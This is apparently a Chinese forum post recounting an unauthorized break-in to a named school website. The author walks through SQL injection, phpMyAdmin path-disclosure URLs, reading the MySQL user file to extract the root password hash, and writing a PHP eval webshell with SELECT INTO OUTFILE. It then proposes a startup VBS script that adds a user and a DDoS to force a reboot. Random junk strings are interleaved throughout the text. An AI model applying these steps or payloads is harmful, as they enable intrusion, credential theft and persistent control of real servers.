第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
5 g2 a) K; Q7 V; j" B8 b发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!* I+ _& _- @) I9 D1 H! J
: E( k+ @! K8 u/ q2 o n
2 Y* G. p" l4 \7 a
2 X: Z& M3 \8 V5 x2 R5 Q% r& w5 B
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 1 N- m) V5 }! P6 V4 |1 g7 k
t" [8 n! G/ J! @- T" l% ~+ y* I那么想可以直接写入shell ,getshell有几个条件:
' b( ~, n+ z6 V! L3 b! ]1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
* ]/ u* K: K* h2 P
5 l+ M2 [* t" \) p7 y# H试着爆绝对路径: % K* s8 c( ?. I4 C
1./phpMyAdmin/index.php?lang[]=1 # s, v* E7 G( _( G
2./phpMyAdmin/phpinfo.php 3 F: L% M7 c% m! q: }
3./load_file()
7 G6 A2 I# e0 b4./phpmyadmin/themes/darkblue_orange/layout.inc.php
/ @: s- v$ `8 Z4 k2 R1 }5./phpmyadmin/libraries/select_lang.lib.php , @" }& ?0 f' _2 D
6./phpmyadmin/libraries/lect_lang.lib.php 7 `* o, i4 k# Q- V8 a+ Y3 r2 q. Y
7./phpmyadmin/libraries/mcrypt.lib.php
; [. A5 c5 @5 J2 o2 _8./phpmyadmin/libraries/export/xls.php " N' k5 f7 s0 Q
l m$ E6 m- V4 g
均不行........................... a: U. C, u4 B# x
7 L/ t l. X$ c! r! C御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
3 P. O, G; }: i8 {1 t8 ]7 w# I0 b) C M S" Z5 e8 F& p7 c
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 7 a: W! E: Q C6 y9 k; R
# x7 m2 Q/ ]: a9 q
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ' j1 h9 q8 r! Q. F; P
, o9 |$ i L, O0 \6 S0 O& n9 x2 M4 u
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
8 c# y9 U) W9 p$ o5 }( S: n/ c4 E7 p& p3 }+ \- T
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 8 _7 F; s/ _; t! v
7 p0 O' X. j% ]1 [3 _
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
2 X Z9 x+ O9 Z4 b+ o) ]- k5 m7 d3 W) V j: ?
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD + q, a5 ?# b% r2 }
" N3 i8 B* [7 b成功读到root密码:
# b/ `7 G( |# H5 [& S0 J6 w6 j0 {$ u [/ b1 Z/ }
17---- r(0072)
2 _/ A K ?; A+ s, t18---- o(006f) : T/ t" }2 d* y$ M6 W+ J
19---- o(006f)
$ R# [" R8 G& D! _% t/ o$ C7 _9 |20---- t(0074)
5 i' K. E! V; w. B21---- *(002a)
) P; l9 B& ?. d' a22---- 8(0038)
0 w6 U. f4 {; i% Q; ?5 y23---- 2(0032) ; Z$ o8 X& c( Y \ V: `
24---- E(0045)
( R! w9 ~, I* e) y; n1 n4 a- J4 f25---- 1(0031)
! w/ h, L' x% W: O+ q9 i9 x) }+ p26---- C(0043)
# `0 z) ]6 _% ?& L; K/ q27---- 5(0035) " s, x. c; Z! E: ?3 L( R# C0 o, `
28---- 8(0038)
: ?7 E$ l! u6 d. k1 F! M. |' o29---- 2(0032)
" }8 I; D8 v8 H& T30---- 8(0038) ( x8 N# r9 s9 d& v9 @
31---- A(0041) - y: o$ F4 {3 v
32---- 9(0039) / T# L" K* N. U1 I
33---- B(0042)
0 D- d" ?2 K* _' E34---- 5(0035) ' o# e# _7 M6 x6 c' |
35---- 4(0034) 3 ^8 Z# w! A+ D4 w: _+ U% \9 N
36---- 8(0038) / M5 \% E- N% a5 |' g6 K/ H( O& A2 {; ^
37---- 6(0036)
$ Z! q5 @* t7 T/ g! L+ J38---- 4(0034)
4 {2 p2 L3 d$ u# C" L) e9 V39---- 9(0039) , @5 z7 w/ n4 {- F, X# j3 o" @3 z: v
40---- 1(0031) 7 Y9 ?1 n5 B% f( {5 b& K& a( q
41---- 1(0031) : p E) S& \! } U
42---- 5(0035)
' [+ W' G, T z1 i- C9 G43---- 3(0033) 6 v7 u a* e3 E6 H
44---- 5(0035)
! P% e9 A7 y$ M( {* o4 t! W) u& a45---- 9(0039)
* y& I( F6 V4 ?# ~; `$ f46---- 8(0038)
. _) U. K7 V: f+ l47---- F(0046)
) C/ a$ {/ Z4 Z& }& U& L48---- F(0046)
e/ ]! B! }" o3 g* h1 u! U49---- 4(0034)
- I3 Z; D$ \4 X4 P+ x50---- F(0046) 5 [0 }( J5 C9 f M$ D5 O
51---- 0(0030) % u1 I, Z& {- _, a. V/ D7 t
52---- 3(0033) / W- q) ]- s4 r' u) h
53---- 2(0032) ! P. m, M. `( Z
54---- A(0041) * }8 B) C% k' M) B! C' n& S0 \1 a
55---- 4(0034) + p& [ d9 O" g& @2 ?- t
56---- A(0041)
" A* X p# G$ s. y57---- B(0042)
9 \& q: E# {7 K+ Y3 g$ a# O( ?58---- *(0044)
$ D/ w% S( L3 z, ]- C- G, C59---- *(0035) . ]: i$ }. g* }0 |' m( f0 s) }7 m
60---- *(0041) + Q" t5 ]7 F2 P
61---- *0032)
( K; d8 B: F% y0 w6 J7 H+ S- N6 l. q
解密后成功登陆phpmyamin : S8 h l5 S) s3 M/ j2 u
" Y0 Z7 p; a1 i1 x0 V- h6 w% f. i7 Y. O$ a
! W/ S! g( |. t6 y
# N! p. V% K: L! F找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
\! n' ?$ o. A
+ s# E2 g) {& P1 Q成功执行,拿下shell,菜刀连接: / P% T3 q8 J6 q J$ ~9 }- p( [
5 s" W% t3 I: }/ X0 ^) c! o1 v4 U, S
服务器不支持asp,aspx,php提权无果................... 5 _6 w6 R g4 D0 ^" ^, E
- w& S# E. U/ t) z2 K" ^但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
4 m7 |; x& p3 i* d, {- R服务器上已经有个隐藏帐号了 : A: B' q, ?2 @0 ?' \+ _! w9 \0 y
别名 administrators; o; Z, \: u9 J9 N" L
注释 管理员对计算机/域有不受限制的完全访问权 : a6 F5 V1 i: c' B6 Z9 [
成员 ' m' n/ b4 S! d# o; Y2 ]$ l
------------------------------------------------------------------------------- o5 Z% R- K! y2 Z. B& {- A7 G
admin
) P$ x9 U6 X3 q0 |. oAdministrator1 T Q2 v% o: ^8 N5 l* f! }' e
slipper$) x) D: F: u/ ?* L# g9 P
sqluser1 J8 u3 X' O1 B) @5 u- t
命令成功完成。 8 e2 y8 @$ O+ n& E2 {. r
0 J" E( d4 _% q. P3 b% r- S
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
2 q6 @& Q! ]; _8 y; n" `2 ~4 X: y5 ^. g5 c$ t+ C N# q
ddos服务器重启,不然就只能坐等服务器重启了.............................../ O- b8 ?% D& n7 h' M% V
: u7 `1 q$ a( ?: x! W
% Z$ Q6 u3 N' ^& G- x1 t+ @
|